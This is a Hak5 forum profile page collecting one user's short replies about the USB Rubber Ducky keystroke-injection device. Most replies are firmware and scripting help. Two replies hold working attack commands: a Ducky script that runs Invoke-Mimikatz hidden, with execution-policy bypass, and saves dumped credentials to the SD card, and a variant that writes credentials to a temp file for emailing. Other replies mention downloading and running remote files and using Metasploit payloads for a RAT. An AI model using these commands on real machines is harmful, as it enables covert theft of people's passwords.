Hak5 Forums


About ThoughtfulDev

  • Rank
    Hak5 Fan +

  1. Installing drivers on target machines issue

    Nope no solution except what you already said: Delay
  2. I dont get this

    Try encoding in your keyboard layout (default is US).
  3. Download a file WITHOUT powershell

    You can run PowerShell and cmd without admin privs, or am I mistaken? E.g. ctrl + r and then powershell/cmd.exe will run it without admin privs.
  4. VPN

    I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
  5. Help with Output

    Are you sure that PHP is enabled in your Apache or IIS webserver? Try to place a PHP file, e.g. test.php, in the web directory root with the following content:

        <?php phpinfo(); ?>

    If you now visit yourwebserver/test.php you should see a table with some information if PHP is enabled. I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz:

        REM -------------------------------------------------------------------------------------
        REM Get drive letter of drive with label DUCKY
        REM -------------------------------------------------------------------------------------
        STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
        ENTER
        DELAY 500
        REM -------------------------------------------------------------------------------------
        REM Copy and execute Invoke Mimikatz
        REM -------------------------------------------------------------------------------------
        STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

    Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
  6. Best Firmware for Ducky Rubber?

    The c_duck_v2.1.hex is the standard TwinDuck firmware, which mounts your Ducky as a HID keyboard and USB storage device. The payload starts as soon as you plug it in. This is probably what you want to use.
  7. HOW play .exe or another file inside DUCKY

    Flash the TwinDuck firmware, which allows the Ducky to be seen as a USB storage device and a HID keyboard. Then call your SD card 'DUCKY' and use this script:

        for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d

    %duck% stores the drive letter of your Ducky :)
  8. A question about scripting

    Use something like:

        Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

    This writes the output of Invoke-Mimikatz to your temp folder in a file named yourpcname_creds.txt, which you can then read and/or even send as an email attachment if you want. PS: the Invoke-Mimikatz script isn't hosted on Darren's webserver - use your own host.
  9. About the 15 seconds password hack

    As far as I know it should show any output since it only writes a file in the current folder (e.g. /var/www/html or sth).
  10. New To Ducky And Have Some Questions.

    It should work as long as there are corresponding hotkeys to do the things you want :)
  11. Accidentially deleted the inject.bin file :(

    FAT32. And no, only the inject.bin, since this was just the hello world payload. As already said, use the Java encoder to encode your raw txt payload into the inject.bin.
  12. Running from Windows 10

    I use this one to find a drive labeled DUCKY (works in Win 10/8/7):

        for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d

    %duck% contains your Ducky drive letter.
  13. [Release] duckyRAT: Rubber Ducky RAT

    Sounds like you need a basic Metasploit payload (don't worry about the stealth/undetected part for now). Have a look at Metasploit Minute for tutorials about Metasploit.
  14. I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs). The error is the line after the ';'. This line tries to run the update.vbs located in the temp folder, but if you want to run a.exe in PowerShell you can't just type a.exe; you have to use ./a.exe (you understand my point?)
  15. Can I get my Rubber Ducky to do this?

    What you are describing is the TwinDuck firmware (have a look at the wiki). It will mount your Ducky as a USB drive and as a HID, so it will execute keystrokes while being mounted as a USB drive. You can of course write the output of the ipconfig command to your USB drive. It will look something like this (in cmd):

        for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do ipconfig > %a/ip.txt

    Note that your SD card must be labeled DUCKY for this to work.